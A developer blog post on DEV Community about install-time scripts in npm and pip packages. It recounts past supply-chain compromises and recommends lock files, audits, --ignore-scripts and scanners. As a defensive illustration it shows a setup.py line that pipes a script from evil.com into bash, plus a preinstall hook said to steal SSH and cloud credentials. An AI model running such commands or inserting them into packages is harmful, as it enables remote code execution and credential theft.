DEV Community

Alex Spinov
Alex Spinov

Posted on

Your npm/pip Install Just Ran Arbitrary Code — And You Didn't Notice

#security #webdev #python #javascript

Every time you run npm install or pip install, you're executing code written by strangers on your machine.

Not the library code. The install scripts.

npm packages can run arbitrary JavaScript during npm install via preinstall, install, and postinstall scripts. pip packages can execute setup.py during installation.

Most of the time, this is fine. Sometimes, it's not.

Real Attacks (Not Hypothetical)

event-stream (2018): A popular npm package (2M weekly downloads) was hijacked. The new maintainer added code that stole cryptocurrency wallet keys. It ran during npm install.

ua-parser-js (2021): 7M weekly downloads. Compromised to install crypto miners and credential stealers.

ctx + phpass (2022): Python packages on PyPI modified to steal environment variables (including AWS keys) and send them to a remote server.

@faker-js/faker (2022): The maintainer intentionally sabotaged the package, printing "LIBERTY LIBERTY LIBERTY" in an infinite loop.

These aren't edge cases. Supply chain attacks are the fastest-growing attack vector in software.

What Happens During Install

npm 

// package.json of a malicious package
{
  "scripts": {
    "preinstall": "node collect-data.js"
  }
}
Enter fullscreen mode Exit fullscreen mode

collect-data.js could:

  • Read your ~/.ssh/ directory
  • Read ~/.aws/credentials
  • Read .env files
  • Send everything to a remote server
  • Install a reverse shell

pip 

# setup.py of a malicious package
import os
os.system('curl https://evil.com/steal.sh | bash')
Enter fullscreen mode Exit fullscreen mode

This runs with YOUR user permissions during pip install.

How to Protect Yourself

1. Lock Files Are Not Optional 

# npm: always commit package-lock.json
npm ci  # Uses lockfile, fails if it doesn't match

# Python: use pip-tools or poetry.lock
pip-compile requirements.in  # Generates pinned requirements.txt
Enter fullscreen mode Exit fullscreen mode

2. Audit Before Installing 

# npm
npm audit
npx socket-security/cli scan

# Python
pip-audit
safety check
Enter fullscreen mode Exit fullscreen mode

3. Use --ignore-scripts (npm) 

# Install without running any scripts
npm install --ignore-scripts

# Then selectively run scripts you trust
npm rebuild
Enter fullscreen mode Exit fullscreen mode

4. Check Package Health

Before adding any dependency:

  • When was it last updated? Abandoned packages get hijacked
  • How many maintainers? Single-maintainer = single point of failure
  • What do install scripts do? Check package.json scripts section
  • Is it a typosquat? lodash vs 1odash vs lodash-utils

5. Use Socket.dev

Socket.dev scans packages for supply chain risks — network access during install, obfuscated code, environment variable access.

Free for open source.

The Bigger Problem

We've built a $4 trillion industry on a system where:

  • Anyone can publish a package
  • Packages can run arbitrary code during install
  • Most developers never audit what they install
  • Package names are first-come-first-served (hello, typosquatting)

This isn't sustainable. Tools like Socket.dev, Snyk, and npm's built-in audit are band-aids on a systemic problem.

Minimum Security Checklist

  • [ ] Lock files committed and used in CI (npm ci, not npm install)
  • [ ] npm audit / pip-audit in CI pipeline
  • [ ] Dependabot or Renovate for automated updates
  • [ ] No * or latest in version ranges
  • [ ] Review new dependencies before adding them

More security tools: Python Security Tools | Awesome Developer Tools 2026

Have you ever been hit by a supply chain attack? Or found something suspicious in a dependency? 👇

Security articles at dev.to/0012303

Top comments (0)